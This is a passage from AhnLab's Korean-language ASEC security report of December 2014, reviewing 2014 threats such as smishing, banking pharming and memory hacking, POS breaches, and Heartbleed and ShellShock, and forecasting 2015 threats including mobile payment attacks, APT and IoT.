공격자가스마트폰채팅애플리케이션을이용해음란화상채팅을유도하여사용자의얼굴과알몸등을동영상으로녹화하는한편악성앱설치를유도해스마트폰내주소록을탈취하는방식이다. 이후공격자는수집한주소록에있는사용자의지인에게몸캠동영상을전송한다고협박하며금전을요구한다. 스미싱 (Smishing) 이라는스마트폰에특화된보안위협이사회전반의화두로떠올랐다. 문자메시지 ASEC REPORT 60 Security Trend 27
(SMS) 와피싱 (Phishing) 의합성어인스미싱은악성코드의유형과문구측면에서더욱진화했다. 기존에는소액결제를노렸으나최근에는인터넷뱅킹에필요한금융정보를노리는악성코드를사용하는등더큰금전적피해를야기하고있다. 사용자를현혹하는스미싱문구또한 택배, 청첩장 / 돌잔치 / 생일초대장, 예비군 / 민방위 등을사칭하는사례가지속적으로발견되는가운데층간소음, 분리수거위반, 쓰레기무단투기등실생활에서쉽게경험할수있는민원을사칭한이른바 생활밀착형 스미싱이등장했다. 이처럼스마트폰을노리는보안위협이심화되는가운데주요정보를스마트폰에저장하는빈도가높아지는만큼각별한주의가필요하며, 특히출처가불분명한스마트폰앱을다운로드할시에는더욱유의해야한다. 2. 인터넷뱅킹을노린파밍악성코드, 메모리해킹 까지 2013년이후인터넷뱅킹정보를노리는 파밍 (Pharming) 악성코드의피해가이어졌고 2014 년에는더욱심화되는양상을보였다. 기존파밍악성코드는 PC의호스트파일을변조해가짜인터넷뱅킹사이트로유도하는방식이었다. 2014년에는인터넷도메인네임시스템 (DNS) 정보를담고있는메모리를변조해사용자가가짜사이트로이동하는것을더욱인지하기어렵게하는방식이등장했다. 또한정상사이트에방문했어도이체거래과정에서금융거래정보등을실시간변조하기위해 인터넷뱅킹모듈의메모리영역을해킹하는형태까지진화했다. 인터넷뱅킹의메모리해킹이란컴퓨터의메모리에있는수취인의계좌번호, 송금액을변조하거나보안카드비밀번호를탈취한후돈을빼돌리는새로운해킹방식이다. 정상적인인터넷뱅킹사이트에접속하더라도이체거래과정에서금융거래정보등을실시간위 변조하는것이특징이다. 이처럼인터넷뱅킹을노리는공격기법이갈수록사용자가인지하기어렵게진화하고있어사용자및기관의주의가요구된다. 3. 공격경로의다양화기존의취약점공격은악용하는프로그램이한정적이었다. 그러나공격대상이확대됨에따라, 특히특정타깃을노리는맞춤형공격이자행되면서공격에사용되는프로그램, 즉공격경로도다양화되고있다. 2014년은이메일, 전자결재, DRM(Digital Rights Management, 디지털콘텐츠저작권보호기술 ), 그룹웨어, 암호화솔루션등다양한프로그램의취약점을이용해악성코드제작이증가함과동시에이들프로그램을공격경로로이용하는복합적인형태의공격이빈번하게포착됐다. 대표적으로문서프로그램의취약점을이용한 MBR 파괴악성코드를이메일의첨부파일형태로전송한사례가있었다. 또는특정프로그램의구동과관련된정상파일을악성파일로교체해악성코드를배포하는사례도발견됐다. 많은기업들이보안에노력을기울이고있음에도불구하고이러한고도화된형태의공격으로악성코드 ASEC REPORT 60 Security Trend 28
에감염된프로그램이고객에게피해를줄수있어더욱주의가필요하다. 4. POS(Point-of-Sales) 시스템해킹국내외를막론하고지난 2014년에는 POS 단말기를해킹해중요거래정보를빼내고, 이정보로부당거래를일으킨피해가빈번히발생했다. 해외의경우, 2013년말미국내대형유통사의 POS 시스템이해킹당해 7천만명이상의개인정보가유출된사건을시작으로 2014년에는세계곳곳에서백화점 식당등의 POS 시스템이해킹당해신용카드정보가유출된사례가지속적으로보고됐다. 국내에서도 POS 시스템공급업체의서버를해킹해정상파일을악성파일로교체하는방식을이용한공격사례가발견되기도했다. 것이다. 하트블리드 는전세계웹사이트에서대다수가사용하는오픈SSL(Open Secure Socket Layer) 에서발견된취약점으로, 웹서비스및모바일비즈니스에잠재적인위협이되고있다. 이른바 쉘쇼크 로불리는배쉬 (Bash) 취약점은대부분의서버 OS로사용되는유닉스및리눅스와관련된취약점으로, 이를통해공격자가원하는코드를손쉽게실행할수있어심각한위협으로대두되었다. 프로그램자체의취약점뿐만아니라리눅스계열시스템에서동작하는웜까지등장하면서보안위협의범위가오픈소스프로그램까지크게확장되었다. 사실보안전문가들은수년전부터 POS 시스템보안에대한우려를제기해왔다. 최근가시적인피해가발생함에따라관련업계및기업들의 POS 시스템보안방안마련이시급해지고있다. 5. 다수의오픈소스취약점등장지금까지는 MS 오피스, 어도비, 오라클등다수의개인과기관이사용하고있는프로그램들에서취약점이발견되는경우가대부분이었다. 그러나 2014년에는특정조직이나시스템에서사용하는오픈소스프로그램과관련된심각한취약점이발견돼전세계적으로큰충격을주었다. 하트블리드 (Heartbleed) 와 쉘쇼크 (ShellShock) 등이그 ASEC REPORT 60 Security Trend 29
2015 년보안위협전망 2015 년보안위협키워드, 다변화 고도화 타깃화 최근영역과경계를허물기시작한보안위협은 2015년에더욱다변화되고고도화될것으로보인다. 또한 2014년연말의국내외주요해킹사례와같은타깃공격이더욱거세질것으로전망된다. 다변화 고도화 타깃화의키워드를중심으로예측가능한 2015년보안위협은 모바일결제및인터넷뱅킹공격심화 공격대상별맞춤형악성코드유포와동작방식의진화 POS 시스템보안위협본격화 오픈소스취약점공격및타깃공격을통한정보유출가속화 IoT 보안위협등이다. 1. 모바일결제및인터넷뱅킹공격심화모바일금융서비스가단순 모바일뱅킹 에서 모바일결제시장 으로그영역과규모가크게확장되고있다. LG경제연구원에따르면매년 30~40% 씩성장해 2017년 800조원에가까운금액이모바일기기를통해결제될것으로전망된다. 또한글로벌시장조사기관가트너는 2016년모바일거래액이 6,169억달러, 이용자수는 4억 4,793만명, 거래건수로는 209억건에달할것으로추정했다. 모바일결제가확대됨에따라이를노리는보안위협또한증가하리라는것은명약관화다. 2012년소액 결제서비스관련모바일악성코드가발견된이후모바일뱅킹을노리는악성코드는지속적으로발견되고있다. 향후모바일결제와관련해각종피해를유발하는알려지지않은악성코드가대량등장할것으로예상되는만큼관련서비스제공업체와사용자의각별한주의가요구된다. 한편 2015년에도다양한웹익스플로잇툴킷 (Web Exploit Toolkit) 을이용한 뱅킹악성코드 유포가급증할것으로보인다. 웹익스플로잇툴킷은다수의취약점을악용해사용자 PC에악성코드를감염시키는공격코드를만드는데쓰인다. 메모리해킹및파밍뿐만아니라각은행의거래시스템에최적화된악성코드가등장할가능성이있으며은행권이외에도카드사, 증권사등금융권전반에걸쳐유사한피해사례가등장할것으로예상된다. 2. 공격대상별맞춤형악성코드유포와동작방식의진화올해는타깃형악성코드의증가와함께악성코드의유포및동작방식또한더욱진화할것으로예측된다. 예를들어연말이나연초등특정한시기에이메일제목뿐만아니라첨부문서자체의내용또한송년회초대또는새해인사등의내용으로보이도록교묘 ASEC REPORT 60 Security Trend 30
하게제작하여사용자의의심을따돌리는것등이다. 또한최근에는시스템에서오랫동안은닉하는악성코드가주로등장했다면앞으로는은닉한상태에서머무는것이아니라수시로은밀히변형을업데이트하여보안제품의탐지를효과적으로피하는등동작방식또한점차진화하는양상을보일전망이다. 이밖에도불특정다수를대상으로유포되는악성코드들이양적으로도뚜렷하게증가하는추세를보이고있다. 블랙마켓에서판매되는악성코드자동생성기나익스플로잇킷등이이러한추세를더욱가속화할것으로보인다. 3. POS 시스템보안위협본격화최근 POS 시스템 (Point Of Sales System) 해킹이지속적으로발생하면서업체들이보안을강화하고있지만이를뛰어넘는다양한방식의공격이등장할것으로예상된다. POS 시스템제작업체를노리는해킹시도또한증가할것으로보인다. 국내외에서 POS 시스템해킹이증가함에따라보안기능이강화된신용카드결제방식으로전환을서두르고있다. 그러나시스템과신용카드를모두교체하기까지는수년의시간과막대한비용이소요될것으로예상돼당분간 POS 시스템에대한보안위협은지속될것으로보인다. 4. 오픈소스취약점공격및타깃공격을통한정보유출가속화오픈소스프로그램들의새로운취약점이등장할것으로예상된다. 2014년에연이어확인된주요오픈소스프로그램의취약점들은예상되는피해범 위가심각해하트블리드 (Heartbleed), 쉘쇼크 (ShellShock) 로표현되기도했다. 오픈소스의특성상지속적인개선이가능해상대적으로안전한것으로알려졌던프로그램에서새로운취약점이잇따라발생함에따라기업과관련업계의대응방안이요구된다. 한편지능형지속위협 APT(Advanced Persistent Threat) 와같은타깃공격이꾸준히증가할것으로보인다. 공격대상또한다양한산업군및국가기관으로확대되고기업기밀, 금융정보, 군사안보정보등을목표로하는타깃공격이심화될전망이다. 유출된정보를범죄에악용하는사례또한더욱증가할것으로예측된다. 아울러최근정치, 사회적으로국가간이해관계가첨예하게대립됨에따라사이버전을통한정보유출시도는더욱격화될전망이다. 5. IoT 보안위협의증가사물인터넷 IoT(Internet of Things) 기술의개발및발전으로 IoT 시장이지속적으로성장하면서이와관련된보안위협이등장할것으로예상된다. 지금까지사물인터넷에대한주요이슈는관련기술개발과 IoT 플랫폼표준화작업이었으나향후사물인터넷기술의표준화와함께관련시장이급격히확대될것으로보인다. 우리주변의모든사물이인터넷을통해정보를주고받고연결되어있다는것은이모든사물이사이버범죄자들의공격대상이될수있다는것을의미한다. IoT 기기는종류와성능또한다양해기존의보안기능을적용하기어렵다. 또한대부분무선네트워크를통한통신이이루어지기때문에무선공유기등무선네트워크보안위협이증가할것으로보인다. ASEC REPORT 60 Security Trend 31
ASEC REPORT vol.60 December, 2014 집필 안랩시큐리티대응센터 (ASEC) 발행처 주식회사안랩 편집 안랩콘텐츠기획팀 경기도성남시분당구판교역로 220 디자인 안랩 UX디자인팀 T. 031-722-8000 F. 031-722-8901 본간행물의어떤부분도안랩의서면동의없이복제, 복사, 검색시스템으로저장또는전송될수없습니다. 안랩, 안랩로고는안랩의등록상표입니다. 그외다른제품또는회사이름은해당소유자의상표또는등록상표일수있습니다. 본문서에수록된정보는고지없이변경될수있습니다. 2014 AhnLab, Inc. All rights reserved.